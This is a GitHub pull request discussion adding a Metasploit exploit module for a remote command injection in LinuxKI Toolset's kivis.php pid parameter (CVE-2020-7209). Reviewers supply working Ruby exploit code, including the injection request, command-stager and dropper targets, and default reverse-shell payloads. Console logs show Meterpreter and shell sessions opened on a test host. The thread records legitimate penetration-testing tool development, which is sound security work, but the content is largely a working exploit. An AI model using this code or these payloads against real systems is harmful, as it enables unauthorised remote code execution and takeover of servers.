Add new module linuxki_rce
rapid7/metasploit-framework pull request #13537
Opened 2020-05-29 15:26 UTC by numanturle

LinuxKI Toolset v6.0-1 and earlier is vulnerable to a remote code execution. The point where the security vulnerability is triggered is the kivis.php pid parameter.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/linuxki_rce`
- [ ] `set RHOST <target_ip>`
- [ ] `set RPORT <target_port>`
- [ ] `set LHOST <your_ip>`
- [ ] `set LPORT <your_port>`
- [ ] Ideally run `check`
- [ ] `set LHOST <your_ip>`
- [ ] `set LPORT <your_port>`
- [ ]  Optional: `set TARGETURI <path_to_linuxki>` if target system uses a different path to LinuxKI
- [ ]  `exploit`

## Scenarios
```
msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
id
uid=48(apache) gid=48(apache) groups=48(apache)
```

2020-05-29 15:49 UTC, h00die requested changes
Please run:
1. `rubocop -a` on your ruby file
2. `tools/dev/msftidy.rb` on your ruby file
3. `tools/dev/msftidy_docs.rb` on your markdown file.

That will address many of the changes needed.  I've added a few more items as well.  Good first time contribution though!

2020-05-30 01:30 UTC, bcoles commented on modules/exploits/linux/http/linuxki_rce.rb
> +      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
It should also be `Failure::Unreachable` rather than `Failure::UnexpectedReply`.

2020-05-30 01:40 UTC, bcoles commented on modules/exploits/linux/http/linuxki_rce.rb
> +  end
It should be fairly simple to modify this module to use a command stager, which is preferred where possible, and allows gaining a Meterpreter session.

Something like this:

```suggestion
  def check
    findstr = Rex::Text.rand_text_alphanumeric(10..15)
    res = execute_command("1;echo '#{findstr}';")

    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)

    if res.code == 200) && res.body.include?(findstr)
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end

  def execute_command(cmd, _opts = {})
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
      'vars_get' => {
        'type' => 'kitrace',
        'pid' => '1;' + cmd + ';'
      }
    })
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end

  def exploit
    print_status('Sending payload...')

    if payload.arch.first == 'cmd'
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: 1500)
    end
  end
```


You'll also need to add the CmdStager mixin and `ARCH_CMD` to `arch` in the module `info` Hash.

2020-05-30 03:00 UTC, bcoles commented on modules/exploits/linux/http/linuxki_rce.rb
> +      execute_cmdstager(linemax: 1_500)
You'll need this too: `include Msf::Exploit::CmdStager`

2020-05-30 08:13 UTC, numanturle reviewed
okey

2020-06-03 06:48 UTC, bcoles commented
Please add a Linux command stager `target`. Take a look at `modules/exploits/unix/webapp/drupal_drupalgeddon2.rb` for example targets.

2020-06-05 19:44 UTC, cdelafuente-r7 requested changes
@numanturle, thanks for this PR. This is a great first contribution! I just added a few comments for you to look at.

2020-06-05 19:44 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/linuxki_rce.rb
> +    if payload.arch.first == 'cmd'
We usually prefer using the Target `Type` field:
```suggestion
    if target['Type'] == :unix_memory
```

2020-06-05 21:43 UTC, numanturle commented on modules/exploits/linux/http/linuxki_rce.rb
> +    if payload.arch.first == 'cmd'
I didn't know how I could do that now, I got it better now. thank you for your contributions ❤️

2020-06-07 15:19 UTC, numanturle commented on modules/exploits/linux/http/linuxki_rce.rb
> +    if payload.arch.first == 'cmd'
Is it possible to automatically reset the payload when the target changes?

2020-06-08 12:48 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/linuxki_rce.rb
> +      dropper
With `:linux_dropper`, the `#dropper` helper method will drop a PHP file, which will then drop a binary file. Since this exploit is able to directly execute an arbitrary command, it could also be interesting to keep `cmdstager` for `:linux_dropper` targets and avoid using PHP to execute a binary payload. This could be useful in certain situations. You can still keep the first option by adding a new target of type `:php_dropper` for Linux platform and ARCH_X* architectures. For example:
```ruby
                [
                  'Automatic (PHP Dropper for Linux binary)',
                  'Platform' => 'linux',
                  'Arch' => [ARCH_X86, ARCH_X64],
                  'Type' => :php_dropper
                ],
```
and this:
```suggestion
    when :linux_dropper
      execute_cmdstager(linemax: 1_500)
    when :php_dropper
      dropper
```

2020-06-08 12:50 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/linuxki_rce.rb
> +    if payload.arch.first == 'cmd'
Absolutely, you can add a default payload per target. It will be automatically selected when the target changes. For example:
```ruby
                [
                  'Automatic (PHP In-Memory)',
                  'Platform' => 'php',
                  'Arch' => ARCH_PHP,
                  'Type' => :php_memory,
                  'Payload' => { 'BadChars' => "'" },
                  'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
                ],
```

2020-06-09 18:17 UTC, cdelafuente-r7 approved these changes

2020-06-09 18:20 UTC, cdelafuente-r7 commented
@numanturle, these changes look good to me. Thanks!

Regarding your question ([here](https://github.com/rapid7/metasploit-framework/pull/13537#discussion_r436373892)), do you still plan to add default payload to each target and be automatically selected when the target changes? If not, I will go ahead and land it.

2020-06-09 18:22 UTC, cdelafuente-r7 commented
@h00die, it looks like the changes you requested were made (still pending approval). Are we good to land?

2020-06-09 18:58 UTC, h00die reviewed
a few doc cleanup items.  @cdelafuente-r7 you can prob make this changes when landing as theyre super minor.

2020-06-09 18:58 UTC, h00die commented on documentation/modules/exploit/linux/http/linuxki_rce.md
> +4. Do: ```set LHOST```
numbering is off here

2020-06-09 18:58 UTC, h00die commented on documentation/modules/exploit/linux/http/linuxki_rce.md
> +LinuxKI Toolset <= 6.01
line can be removed

2020-06-09 18:58 UTC, h00die commented on documentation/modules/exploit/linux/http/linuxki_rce.md
> +### TARGETURI
I thought we removed these, but it looks like its just `uripath`.  Regardless, I think this can be removed and `msftidy_docs` should be udpated to remove this option

2020-06-09 18:58 UTC, h00die commented on documentation/modules/exploit/linux/http/linuxki_rce.md
> +### LinuxKI Toolset v6.01
append: `on  CentOS 7.8`

2020-06-09 18:59 UTC, h00die commented
other than those few doc changes I just added, i'm happy with it

2020-06-09 23:01 UTC, numanturle commented
> @numanturle, these changes look good to me. Thanks!
> 
> Regarding your question ([here](https://github.com/rapid7/metasploit-framework/pull/13537#discussion_r436373892)), do you still plan to add default payload to each target and be automatically selected when the target changes? If not, I will go ahead and land it.

I added default payloads 👍

2020-06-09 23:05 UTC, numanturle commented on documentation/modules/exploit/linux/http/linuxki_rce.md
> +### TARGETURI
I couldn't understand what to do here. Should I delete documents and modules because we don't need them?    Should I use `uripath `  instead?

2020-06-09 23:11 UTC, h00die commented on documentation/modules/exploit/linux/http/linuxki_rce.md
> +### TARGETURI
you can remove the TARGETURI option from the docs.  Its a standard option for most/all HTTP modules

2020-06-10 09:40 UTC, cdelafuente-r7 commented
I tested this exploit against LinuxKI Toolset v6.01 on x64 CentOS 7.8.2003 virtual machine, with `httpd` running in a docker container, as described in your module documentation. I successfully got a session with every Target. Also, I verified that the payload is setup automatically when the Target changes.

<details>
<summary>Example output</summary>

```
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/Users/cdelafuente/dev/src/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------


IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.92-dev-9e810cb345               ]
+ -- --=[ 2024 exploits - 1100 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the resource command to run commands from a file

msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set payload 0
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(linux/http/linuxki_rce) > set RHOSTS 172.16.60.173
RHOSTS => 172.16.60.173
msf5 exploit(linux/http/linuxki_rce) > set RPORT 32777
RPORT => 32777
msf5 exploit(linux/http/linuxki_rce) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(linux/http/linuxki_rce) > set verbose true
verbose => true
msf5 exploit(linux/http/linuxki_rce) > check
[+] 172.16.60.173:32777 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (PHP In-Memory) target
[*] Sending payload...
[*] Sending stage (38288 bytes) to 172.16.60.173
[*] Meterpreter session 1 opened (172.16.60.1:4444 -> 172.16.60.173:59092) at 2020-06-10 11:18:49 +0200

meterpreter > getuid
Server username:  (48)
meterpreter > sysinfo
Computer    : 1e562def69e5
OS          : Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.60.173 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) > set target 1
target => 1
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (PHP Dropper)


msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (PHP Dropper) target
[*] Sending payload...
[*] Sending stage (38288 bytes) to 172.16.60.173
[*] Meterpreter session 2 opened (172.16.60.1:4444 -> 172.16.60.173:59094) at 2020-06-10 11:19:46 +0200
[!] This exploit may require manual cleanup of '/tmp/dKuRXOy3A30DI7L5Leh.php' on the target

meterpreter > sysinfo
Computer    : 1e562def69e5
OS          : Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.60.173 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) > set target 2
target => 2
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Automatic (Unix In-Memory)


msf5 exploit(linux/http/linuxki_rce) > ru [...]

2020-06-10 09:41 UTC, cdelafuente-r7 commented
@numanturle , thanks for this great contribution! I will go ahead and land it today.

2020-06-10 09:44 UTC, numanturle commented
> @numanturle , thanks for this great contribution! I will go ahead and land it today.

i am learning new things enjoy it very much. ❤️

2020-06-10 09:48 UTC, merged

2020-06-10 10:01 UTC, cdelafuente-r7 commented
# Release Notes
This adds a new module to exploit a RCE in LinuxKI Toolset v6.01 and earlier. This vulnerability is related to an improper input validation in a HTTP GET parameter. An attacker can leverage this to execute arbitrary command in the context of the web server. This vulnerability is identified as CVE-2020-7209.